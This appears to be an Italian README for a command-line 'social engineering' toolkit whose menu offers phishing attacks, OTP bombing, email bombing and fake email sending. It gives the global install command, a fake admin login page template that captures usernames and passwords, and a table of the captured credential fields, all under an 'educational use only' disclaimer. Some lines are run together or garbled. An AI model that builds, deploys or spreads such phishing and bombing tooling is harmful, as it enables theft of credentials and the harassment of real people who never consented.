
Framework SEt
Un potente toolkit di social engineering che automatizza phishing, OTP/email bombing, email false e altro — creato con ❤️ da @karthithehacker

⚠️ Solo per uso educativo. Non usare questo strumento contro nessuno senza autorizzazione esplicita.
(Le opzioni relative a keylogger e IP changer sono state rimosse nella versione JavaScript.)
axioschalkorasocket.iouuidSocialEngineering/
├── AttackModes/
│ ├── emailBombing.js
│ ├── emailspoofing.js
│ ├── otpBombing.js
│ ├── provider.js
│ └── … (other helpers)
├── includes/
│ ├── banner.js
│ ├── dbgateway.js
│ ├── menu.js
│ ├── phishing.js
│ └── utils.js
├── db/
│ └── Socialengineering-db.json
├── SocialEngineering.js # main CLI entry
├── package.json
└── README.md
npm install socialengineering -g
SocialEngineering
Menu di esempio:
███████╗ ██████╗ ██████╗██╗ █████╗ ██╗
██╔════╝██╔═══██╗██╔════╝██║██╔══██╗██║
███████╗██║ ██║██║ ██║███████║██║
╚════██║██║ ██║██║ ██║██╔══██║██║
███████║╚██████╔╝╚██████╗██║██║ ██║███████╗
╚══════╝ ╚═════╝ ╚═════╝╚═╝╚═╝ ╚═╝╚══════╝
███████╗███╗ ██╗ ██████╗ ██╗███╗ ██╗███████╗███████╗██████╗ ██╗███╗ ██╗ ██████╗
██╔════╝████╗ ██║██╔════╝ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║████╗ ██║██╔════╝
█████╗ ██╔██╗ ██║██║ ███╗██║██╔██╗ ██║█████╗ █████╗ ██████╔╝██║██╔██╗ ██║██║ ███╗
██╔══╝ ██║╚██╗██║██║ ██║██║██║╚██╗██║██╔══╝ ██╔══╝ ██╔══██╗██║██║╚██╗██║██║ ██║
███████╗██║ ╚████║╚██████╔╝██║██║ ╚████║███████╗███████╗██║ ██║██║██║ ╚████║╚██████╔╝
╚══════╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝
Website: cappriciosec.com
Main Menu
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ No. ┃ Option ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ 🎯 Start Phishing Attack │
│ 2 │ 📲 OTP Bombing │
│ 3 │ 📩 Email Bombing │
│ 4 │ 📧 Send Fake Email │
│ 0 │ ❌ Quit │
└━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┘
👉 Select an option:
templates/ è usata dal modulo di phishing; puoi aggiungere nuovi template seguendo questa struttura:
~/SocialEngineering-Templates/
├── yourtemplatename/
├── index.html
└── index.css
/login.index.html <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>XYZ Admin Login</title>
<link rel="stylesheet" href="index.css">
</head>
<body>
<form action="/login" method="post" class="login-box">
<h2>Login</h2>
<input type="text" name="username" placeholder="Username or Email" required>
<input type="hidden" name="type" value="xyz"></input>
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
<div class="note">fake template</div>
</form>
</body>
</html>
L'endpoint login.php riceve le credenziali dalle pagine di login false (template). Quando un utente invia il modulo di login, il server cattura i seguenti parametri:
/loginProssimamente:
Questo strumento è destinato esclusivamente a un uso educativo ed etico. Non usarlo per attaccare obiettivi senza previo consenso. Lo sviluppatore non si assume alcuna responsabilità per usi impropri o attività illegali.
| Parametro | Tipo | Descrizione |
|---|
username | string | Obbligatorio. Nome utente o email inseriti dall'utente |
password | string | Obbligatoria. Password inserita dall'utente |
type | string | Obbligatorio. Nome del template impostato dallo sviluppatore |